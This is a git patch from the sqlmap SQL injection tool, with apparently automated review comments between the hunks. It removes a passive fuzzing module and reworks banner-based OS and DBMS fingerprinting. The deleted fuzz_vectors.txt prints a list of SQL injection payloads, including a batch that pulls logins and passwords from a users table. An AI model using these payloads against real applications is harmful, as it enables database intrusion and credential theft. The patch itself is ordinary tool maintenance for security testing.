From 66fb3c3033b216076530bba3c8cee2331cc96a75 Mon Sep 17 00:00:00 2001 From: Bernardo Damele Date: Mon, 17 Nov 2008 11:22:03 +0000 Subject: [PATCH] Minor enhancement to show the DBMS operating system (if fingerprinted) also when only -b option is provided since it's an information that sqlmap get parsing the DBMS banner. Got rid completely of useless passive fuzzing.
---
lib/utils/fuzzer.py | 43 ------------------------------- plugins/dbms/mssqlserver.py | 34 ++++++++++++++----------- plugins/dbms/mysql.py | 40 +++++++++++++++++++---------- plugins/dbms/oracle.py | 32 +++++++++++++---------- plugins/dbms/postgresql.py | 32 +++++++++++++---------- txt/fuzz_vectors.txt | 51 ------------------------------------- xml/banner/generic.xml | 16 ++++++++++++ 7 files changed, 99 insertions(+), 149 deletions(-) delete mode 100644 lib/utils/fuzzer.py delete mode 100644 txt/fuzz_vectors.txt
diff --git a/lib/utils/fuzzer.py b/lib/utils/fuzzer.py
deleted file mode 100644
index ad9647c3b..000000000
--- a/lib/utils/fuzzer.py
+++ /dev/null
@@ -1,43 +0,0 @@
-#!/usr/bin/env python
-
-"""
-$Id$
-
-This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
-
-Copyright (c) 2006-2008 Bernardo Damele A. G.
- and Daniele Bellucci
-
-sqlmap is free software; you can redistribute it and/or modify it under
-the terms of the GNU General Public License as published by the Free
-Software Foundation version 2 of the License.
-
-sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
-WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
-FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
-details.
-
-You should have received a copy of the GNU General Public License along
-with sqlmap; if not, write to the Free Software Foundation, Inc., 51
-Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
-"""
-
-
-
-from lib.core.agent import agent
-from lib.core.data import logger
-from lib.core.data import paths
-from lib.request.connect import Connect as Request
-
-
-def passiveFuzzing():
- logMsg = "executing passive fuzzing to retrieve DBMS error messages"
- logger.info(logMsg)
-
- fuzzVectors = open(paths.FUZZ_VECTORS, "r")
-
- for fuzzVector in fuzzVectors:
- fuzzVector = fuzzVector.replace("\r", "").replace("\n", "")
-
- payload = agent.payload(newValue=fuzzVector)
- Request.queryPage(payload)
diff --git a/plugins/dbms/mssqlserver.py b/plugins/dbms/mssqlserver.py
index 4b52f3455..9be2dab7c 100644
--- a/plugins/dbms/mssqlserver.py
+++ b/plugins/dbms/mssqlserver.py
@@ -46,7 +46,6 @@ from lib.core.unescaper import unescaper
 from lib.parse.banner import bannerParser
 from lib.request import inject
 from lib.request.connect import Connect as Request
-#from lib.utils.fuzzer import passiveFuzzing
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@@ -124,8 +123,19 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
 def getFingerprint(self):
- value = "back-end DBMS: "
- actVer = formatDBMSfp()
+ value = ""
+ info = None
+ formatInfo = None
+
+ if self.banner:
+ info = bannerParser(self.banner)
+ formatInfo = formatOSfp(info)
+
+ if formatInfo:
+ value += "%s\n" % formatInfo
+
+ value += "back-end DBMS: "
+ actVer = formatDBMSfp()
 if not conf.extensiveFp:
 value += actVer
@@ -135,12 +145,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
 formatInfo = None
 value += "active fingerprint: %s" % actVer
- if self.banner:
- info = bannerParser(self.banner)
+ if info:
 release = info["dbmsRelease"]
 version = info["dbmsVersion"]
 servicepack = info["dbmsServicePack"]
- formatInfo = formatOSfp(info)
 if release and version and servicepack:
 banVer = "Microsoft SQL Server %s " % release
@@ -149,15 +157,11 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
 value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- #passiveFuzzing()
 htmlErrorFp = getHtmlErrorFp()
 if htmlErrorFp:
 value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
- if formatInfo:
- value += "\n%s" % formatInfo
-
 return value
@@ -165,6 +169,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
 if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
 setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
+ if conf.getBanner:
+ self.banner = inject.getValue("@@VERSION")
+
 if not conf.extensiveFp:
 return True
@@ -172,10 +179,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
 logger.info(logMsg)
 randInt = str(randomInt(1))
- query = "LTRIM(STR(LEN(%s)))" % randInt
+ query = "LTRIM(STR(LEN(%s)))" % randInt
 if inject.getValue(query) == "1":
- query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
+ query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
 version = inject.getValue(query)
 if version == "8":
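Review bot: The block added at the top of `getFingerprint` — `info = bannerParser(self.banner)`, `formatInfo = formatOSfp(info)`, `value += "%s\n" % formatInfo` — is repeated verbatim in the mysql (@@ -182), oracle (@@ -118) and postgresql (@@ -118) hunks of this commit. All four classes already inherit `Fingerprint`, so one helper there that returns the OS line (or an empty string) would keep the four copies from drifting apart. Whether `bannerParser` can return a falsy value is not visible here; if it can, guarding the `formatOSfp(info)` call with `if info:` is cheaper than relying on `formatOSfp` to accept None. getFingerprint continues past the end of this hunk.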
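Review bot: The context line `formatInfo = None` at the top of the @@ -135 hunk is now a dead assignment: `formatInfo` is produced and consumed at the start of getFingerprint by the @@ -124 hunk, and its only later reader, `if formatInfo: value += "\n%s" % formatInfo`, is removed by the @@ -149 hunk, with no other use visible in the hunks. The same leftover appears in the oracle (@@ -129) and postgresql (@@ -129) hunks. Dropping the line in all three plugins keeps a reader from hunting for a value that is no longer produced on that path.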
@@ -190,9 +197,6 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
 else:
 setDbms("Microsoft SQL Server")
- if not conf.extensiveFp:
- return True
-
 if conf.getBanner:
 self.banner = inject.getValue("@@VERSION")
diff --git a/plugins/dbms/mysql.py b/plugins/dbms/mysql.py
index b9ba41e7e..05752ef96 100644
--- a/plugins/dbms/mysql.py
+++ b/plugins/dbms/mysql.py
@@ -47,7 +47,6 @@ from lib.core.unescaper import unescaper
 from lib.parse.banner import bannerParser
 from lib.request import inject
 from lib.request.connect import Connect as Request
-#from lib.utils.fuzzer import passiveFuzzing
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@@ -182,8 +181,19 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 def getFingerprint(self):
- value = "back-end DBMS: "
- actVer = formatDBMSfp()
+ value = ""
+ info = None
+ formatInfo = None
+
+ if self.banner:
+ info = bannerParser(self.banner)
+ formatInfo = formatOSfp(info)
+
+ if formatInfo:
+ value += "%s\n" % formatInfo
+
+ value += "back-end DBMS: "
+ actVer = formatDBMSfp()
 if not conf.extensiveFp:
 value += actVer
@@ -198,25 +208,21 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 comVer = formatDBMSfp([comVer])
 value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
- if self.banner:
- info = bannerParser(self.banner)
- formatInfo = formatOSfp(info)
-
+ if info:
+ # TODO: move to the XML banner file
 banVer = info['version']
+
 if re.search("-log$", self.banner):
 banVer += ", logging enabled"
+
 banVer = formatDBMSfp([banVer])
 value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- #passiveFuzzing()
 htmlErrorFp = getHtmlErrorFp()
 if htmlErrorFp:
 value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
- if formatInfo:
- value += "\n%s" % formatInfo
-
 return value
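Review bot: In the extensive-fingerprint path the `@@VERSION` banner is now fetched twice: once by the `if conf.getBanner:` block added before the early return in the @@ -165 hunk, and again by the block this hunk leaves in place after `setDbms("Microsoft SQL Server")`, at least on the `else:` path visible here. The mysql, oracle and postgresql hunks of this commit remove their trailing fetch; removing these two lines here as well (`if conf.getBanner:` / `self.banner = inject.getValue("@@VERSION")`) keeps the four plugins consistent and saves a redundant request. Whether an intervening return sits between the two sites lies outside the hunk.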
@@ -235,6 +241,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 if int(kb.dbmsVersion[0]) >= 5:
 self.has_information_schema = True
+ if conf.getBanner:
+ self.banner = inject.getValue("VERSION()")
+
 if not conf.extensiveFp:
 return True
@@ -261,6 +270,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 setDbms("MySQL 5")
 self.has_information_schema = True
+ if conf.getBanner:
+ self.banner = inject.getValue("VERSION()")
+
 if not conf.extensiveFp:
 kb.dbmsVersion = [">= 5.0.0"]
 return True
@@ -306,6 +318,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 setDbms("MySQL 4")
 kb.dbmsVersion = ["< 5.0.0"]
+ if conf.getBanner:
+ self.banner = inject.getValue("VERSION()")
+
 if not conf.extensiveFp:
 return True
@@ -332,9 +347,6 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 else:
 kb.dbmsVersion = ["< 3.22.11"]
- if conf.getBanner:
- self.banner = inject.getValue("VERSION()")
-
 return True
 else:
 warnMsg = "the back-end DMBS is not MySQL"
diff --git a/plugins/dbms/oracle.py b/plugins/dbms/oracle.py
index 6a9a7c773..b72ba78c4 100644
--- a/plugins/dbms/oracle.py
+++ b/plugins/dbms/oracle.py
@@ -39,7 +39,6 @@ from lib.core.settings import ORACLE_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.parse.banner import bannerParser
 from lib.request import inject
-#from lib.utils.fuzzer import passiveFuzzing
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@@ -118,7 +117,18 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
 def getFingerprint(self):
- value = "back-end DBMS: "
+ value = ""
+ info = None
+ formatInfo = None
+
+ if self.banner:
+ info = bannerParser(self.banner)
+ formatInfo = formatOSfp(info)
+
+ if formatInfo:
+ value += "%s\n" % formatInfo
+
+ value += "back-end DBMS: "
 if not conf.extensiveFp:
 value += "Oracle"
@@ -129,23 +139,16 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
 formatInfo = None
 value += "active fingerprint: %s" % actVer
- if self.banner:
- info = bannerParser(self.banner)
- formatInfo = formatOSfp(info)
-
+ if info:
 banVer = info['version']
 banVer = formatDBMSfp([banVer])
 value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- #passiveFuzzing()
 htmlErrorFp = getHtmlErrorFp()
 if htmlErrorFp:
 value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
- if formatInfo:
- value += "\n%s" % formatInfo
-
 return value
@@ -153,6 +156,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
 if conf.dbms in ORACLE_ALIASES:
 setDbms("Oracle")
+ if conf.getBanner:
+ self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
+
 if not conf.extensiveFp:
 return True
@@ -177,6 +183,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
 setDbms("Oracle")
+ if conf.getBanner:
+ self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
+
 if not conf.extensiveFp:
 return True
@@ -189,9 +198,6 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
 elif re.search("^8", version):
 kb.dbmsVersion = ["8i"]
- if conf.getBanner:
- self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
-
 return True
 else:
 warnMsg = "the back-end DMBS is not Oracle"
diff --git a/plugins/dbms/postgresql.py b/plugins/dbms/postgresql.py
index 2343a1cd4..bc24774b0 100644
--- a/plugins/dbms/postgresql.py
+++ b/plugins/dbms/postgresql.py
@@ -40,7 +40,6 @@ from lib.core.settings import PGSQL_SYSTEM_DBS
 from lib.core.unescaper import unescaper
 from lib.parse.banner import bannerParser
 from lib.request import inject
-#from lib.utils.fuzzer import passiveFuzzing
 from plugins.generic.enumeration import Enumeration
 from plugins.generic.filesystem import Filesystem
@@ -118,7 +117,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 def getFingerprint(self):
- value = "back-end DBMS: "
+ value = ""
+ info = None
+ formatInfo = None
+
+ if self.banner:
+ info = bannerParser(self.banner)
+ formatInfo = formatOSfp(info)
+
+ if formatInfo:
+ value += "%s\n" % formatInfo
+
+ value += "back-end DBMS: "
 if not conf.extensiveFp:
 value += "PostgreSQL"
@@ -129,23 +139,16 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 formatInfo = None
 value += "active fingerprint: %s" % actVer
- if self.banner:
- info = bannerParser(self.banner)
- formatInfo = formatOSfp(info)
-
+ if info:
 banVer = info['version']
 banVer = formatDBMSfp([banVer])
 value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
- #passiveFuzzing()
 htmlErrorFp = getHtmlErrorFp()
 if htmlErrorFp:
 value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
- if formatInfo:
- value += "\n%s" % formatInfo
-
 return value
@@ -157,6 +160,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 if conf.dbms in PGSQL_ALIASES:
 setDbms("PostgreSQL")
+ if conf.getBanner:
+ self.banner = inject.getValue("VERSION()")
+
 if not conf.extensiveFp:
 return True
@@ -180,6 +186,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 setDbms("PostgreSQL")
+ if conf.getBanner:
+ self.banner = inject.getValue("VERSION()")
+
 if not conf.extensiveFp:
 return True
@@ -215,9 +224,6 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
 else:
 kb.dbmsVersion = ["< 6.2.0"]
- if conf.getBanner:
- self.banner = inject.getValue("VERSION()")
-
 return True
 else:
 warnMsg = "the back-end DMBS is not PostgreSQL"
diff --git a/txt/fuzz_vectors.txt b/txt/fuzz_vectors.txt
deleted file mode 100644
index 428e2ef9a..000000000
--- a/txt/fuzz_vectors.txt
+++ /dev/null
@@ -1,51 +0,0 @@ -'||(elt(-3+5,bin(15),ord(10),hex(char(45)))) -||6 -'||'6 -(||6) -' OR 1=1-- -OR 1=1 -' OR '1'='1 -; OR '1'='1' -%22+or+isnull%281%2F0%29+%2F* -%27+OR+%277659%27%3D%277659 -%22+or+isnull%281%2F0%29+%2F* -%27+--+ -' or 1=1-- -" or 1=1-- -' or 1=1 /* -or 1=1-- -' or 'a'='a -" or "a"="a -') or ('a'='a -Admin' OR ' -'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES-- -) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES; -' having 1=1-- -' having 1=1-- -' group by userid having 1=1-- -' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')-- -' or 1 in (select @@version)-- -' union all select @@version-- -' OR 'unusual' = 'unusual' -' OR 'something' = 'some'+'thing' -' OR 'text' = N'text' -' OR 'something' like 'some%' -' OR 2 > 1 -' OR 'text' > 't' -' OR 'whatever' in ('whatever') -' OR 2 BETWEEN 1 and 3 -' or username like char(37); -' union select * from users where login = char(114,111,111,116); -' union select -Password:*/=1-- -UNI/**/ON SEL/**/ECT -'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER' -'; EXEC ('SEL' + 'ECT US' + 'ER') -'/**/OR/**/1/**/=/**/1 -' or 1/* -+or+isnull%281%2F0%29+%2F* -%27+OR+%277659%27%3D%277659 -%22+or+isnull%281%2F0%29+%2F* -%27+--+&password= -'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login > - @var select @var as var into temp end -- diff --git a/xml/banner/generic.xml b/xml/banner/generic.xml index cf460474f..4e06fc708 100644 --- a/xml/banner/generic.xml +++ b/xml/banner/generic.xml @@ -6,18 +6,34 @@ + + + + + + + + + + + + + + + +